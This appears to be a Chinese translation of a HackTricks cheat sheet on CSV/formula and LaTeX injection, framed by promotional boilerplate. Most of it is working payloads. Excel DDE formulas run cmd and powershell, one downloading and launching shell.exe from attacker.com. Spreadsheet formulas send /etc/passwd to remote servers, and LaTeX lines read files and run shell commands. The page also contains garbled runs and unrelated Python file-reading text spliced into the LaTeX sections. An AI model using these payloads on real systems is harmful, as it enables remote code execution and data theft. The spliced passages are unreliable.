# 公式/CSV/文档/LaTeX/GhostScript注入
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * 你在一家**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) * 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) * **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。** * **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
找到最重要的漏洞,以便更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从API到Web应用程序和云系统。[**立即免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** ## 公式注入 ### 信息 如果您的**输入**被**反射**到**CSV文件**(或任何其他可能被**Excel**打开的文件)中,您可能可以放置Excel**公式**,当用户**打开文件**或用户**在Excel表格中点击某个链接**时,这些公式将被**执行**。 {% hint style="danger" %} 现在的**Excel会警告**(多次)**用户当从Excel外部加载内容时**,以防止他进行恶意操作。因此,必须对社会工程学进行特殊努力以获得最终有效载荷。 {% endhint %} ### [字典](https://github.com/payloadbox/csv-injection-payloads) ``` DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+9)*cmd|' /C calc'!A0 =10+20+cmd|' /C calc'!A0 =cmd|' /C notepad'!'A1' =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 ``` ### 超链接 **以下示例非常有用,可以从最终的Excel表中窃取内容并向任意位置发送请求。但是需要用户点击链接(并接受警告提示)。** 示例来自[https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit) 让我们假设一个学校的学生记录管理系统的攻击场景。该应用程序允许教师输入学生的详细信息。攻击者获得了对应用程序的访问权限,并希望所有使用该应用程序的教师都受到威胁。因此,攻击者尝试通过Web应用程序执行CSV注入攻击。\ 攻击者需要窃取其他学生的详细信息。因此,攻击者在输入学生详细信息时使用了超链接公式。 ![](https://payatu.com/wp-content/uploads/2017/11/Selection\_008.png) 当教师导出CSV并点击超链接时,敏感数据将被发送到攻击者的服务器。 ![](https://payatu.com/wp-content/uploads/2017/11/Selection\_009.png) 导出的CSV文件中包含恶意有效负载。 ![](https://payatu.com/wp-content/uploads/2017/11/Selection\_010.png) 学生详细信息被记录在攻击者的Web服务器中。 ![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png) ### RCE 为了使此示例工作,**需要启用以下配置**:\ 文件 → 选项 → 信任中心 → 信任中心设置 → 外部内容 → 启用动态数据交换服务器启动\ 或使用**旧版本的Excel**。 好消息是,**当打开文件时,此有效负载会自动执行**(如果用户接受警告)。 可以使用以下有效负载执行计算器 **`=cmd|' /C calc'!xxx`** ![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) ```bash =cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1 ``` ### LFI **LibreOffice Calc** * 这将从本地的/etc/passwd文件中读取第一行:`='file:///etc/passwd'#$passwd.A1` * 将其外泄:`=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))` * 外泄多行:`=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))` * DNS外泄:`=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))` **分析DNS外泄负载:** * ‘file:///etc/passwd’#$passwd.A19 - 将从本地的/etc/passwd文件中读取第19行 * ENCODEURL(‘file:///etc/passwd’#$passwd.A19) - 对返回的数据进行URL编码 * MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41) - 类似于子字符串,从第一个字符到第41个字符读取数据 - 这是一种非常方便的限制DNS主机名长度的方法(FQDN的字符限制为254个字符,标签的字符限制为63个字符,即子域名) * SUBSTITUTE(MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41),”%”,”-“) - 将所有%(URL编码的特殊字符)的实例替换为破折号 - 这样可以确保只使用有效的DNS字符 * CONCATENATE((SUBSTITUTE(MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41),”%”,”-“)),”.\”) - 将文件的输出(在进行上述处理后)与FQDN(我们可以控制的域的权威主机)连接起来 * WEBSERVICE - 将请求此不存在的DNS名称,然后我们可以解析DNS权威名称服务器上的日志(或运行tcpdump等) ### Google Sheets OOB数据外泄 首先,让我们介绍一些更有趣的函数。 **CONCATENATE**: 将字符串连接在一起。 ``` =CONCATENATE(A2:E2) ``` **IMPORTXML**: 从各种结构化数据类型中导入数据,包括XML、HTML、CSV、TSV以及RSS和ATOM XML订阅源。 ``` =IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10") ``` **IMPORTFEED**: 导入一个RSS或ATOM源。 ``` =IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2))) ``` **IMPORTHTML**: 从HTML页面中导入表格或列表中的数据。 ``` =IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1) ``` **IMPORTRANGE**: 从指定的电子表格中导入一系列单元格。 ``` =IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2") ``` **图片**:将一张图片插入到单元格中。 ``` =IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png") ``` ## LaTeX注入 通常在互联网上找到的将LaTeX代码转换为PDF的服务器使用`pdflatex`。\ 该程序使用3个主要属性来(禁止)允许命令执行: - `--no-shell-escape`:即使在texmf.cnf文件中启用了`\write18{command}`构造,也会**禁用**它。 - `--shell-restricted`:与`--shell-escape`相同,但仅限于一组**预定义**的“安全”命令(在Ubuntu 16.04上,列表位于`/usr/share/texmf/web2c/texmf.cnf`中)。 - `--shell-escape`:启用`\write18{command}`构造。该命令可以是任何shell命令。出于安全原因,通常禁止使用此构造。 然而,还有其他执行命令的方法,因此为了避免远程命令执行(RCE),使用`--shell-restricted`非常重要。 ### 读取文件 您可能需要使用\[或$等包装器来调整注入。 ```bash \input{/etc/passwd} \include{password} # load .tex file \lstinputlisting{/usr/share/texmf/web2c/texmf.cnf} \usepackage{verbatim} \verbatiminput{/etc/passwd} ``` #### 读取单行文件 To read a single line from a file, you can use the `readline()` function in Python. This function reads one line at a time from the file and returns it as a string. ```python with open('file.txt', 'r') as file: line = file.readline() print(line) ``` The `open()` function is used to open the file in read mode (`'r'`). The `with` statement ensures that the file is properly closed after reading. The `readline()` function reads the first line from the file and assigns it to the variable `line`. Finally, the line is printed to the console. You can modify the code to read multiple lines by calling `readline()` multiple times in a loop. ```bash \newread\file \openin\file=/etc/issue \read\file to\line \text{\line} \closein\file ``` #### 读取多行文件 To read a file that contains multiple lines, you can use the following code: 要读取包含多行的文件,可以使用以下代码: ```python with open('filename.txt', 'r') as file: lines = file.readlines() for line in lines: print(line.strip()) ``` This code opens the file named `filename.txt` in read mode (`'r'`) and uses the `readlines()` method to read all the lines in the file. The lines are then printed one by one using a loop. The `strip()` method is used to remove any leading or trailing whitespace from each line. 这段代码以读取模式(`'r'`)打开名为 `filename.txt` 的文件,并使用 `readlines()` 方法读取文件中的所有行。然后,使用循环逐行打印这些行。`strip()` 方法用于删除每行开头和结尾的空白字符。 By using this code, you can easily read and process files that contain multiple lines of text. 通过使用这段代码,您可以轻松读取和处理包含多行文本的文件。 ```bash \newread\file \openin\file=/etc/passwd \loop\unless\ifeof\file \read\file to\fileline \text{\fileline} \repeat \closein\file ``` ### 写入文件 ```bash \newwrite\outfile \openout\outfile=cmd.tex \write\outfile{Hello-world} \closeout\outfile ``` ### 命令执行 命令的输入将被重定向到stdin,请使用临时文件来获取它。 ```bash \immediate\write18{env > output} \input{output} \input{|"/bin/hostname"} \input{|"extractbb /etc/passwd > /tmp/b.tex"} # allowed mpost command RCE \documentclass{article}\begin{document} \immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"} \end{document} # If mpost is not allowed there are other commands you might be able to execute ## Just get the version \input{|"bibtex8 --version > /tmp/b.tex"} ## Search the file pdfetex.ini \input{|"kpsewhich pdfetex.ini > /tmp/b.tex"} ## Get env var value \input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"} ## Get the value of shell_escape_commands without needing to read pdfetex.ini \input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"} ``` 如果遇到任何LaTex错误,请考虑使用base64来获取结果,以避免出现不良字符。 ```bash \immediate\write18{env | base64 > test.tex} \input{text.tex} ``` ```bash \input|ls|base4 \input{|"/bin/hostname"} ``` ### 跨站脚本攻击 来自[@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)的信息 ```bash \url{javascript:alert(1)} \href{javascript:alert(1)}{placeholder} ``` ## Ghostscript注入 TODO: 从[https://blog.redteam-pentesting.de/2023/ghostscript-overview/](https://blog.redteam-pentesting.de/2023/ghostscript-overview/)中提取出更相关的信息和技术,创建一个摘要。 ## 参考资料 * [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1) * [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/) * [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection) * [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
找到最重要的漏洞,以便更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,从API到Web应用程序和云系统中查找问题。[**立即免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。 {% embed url="https://www.intruder.io/?utm\_campaign=hacktricks&utm\_source=referral" %}
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * 您在**网络安全公司**工作吗?您想在HackTricks中看到您的**公司广告**吗?或者您想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) * 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) * **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。** * **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**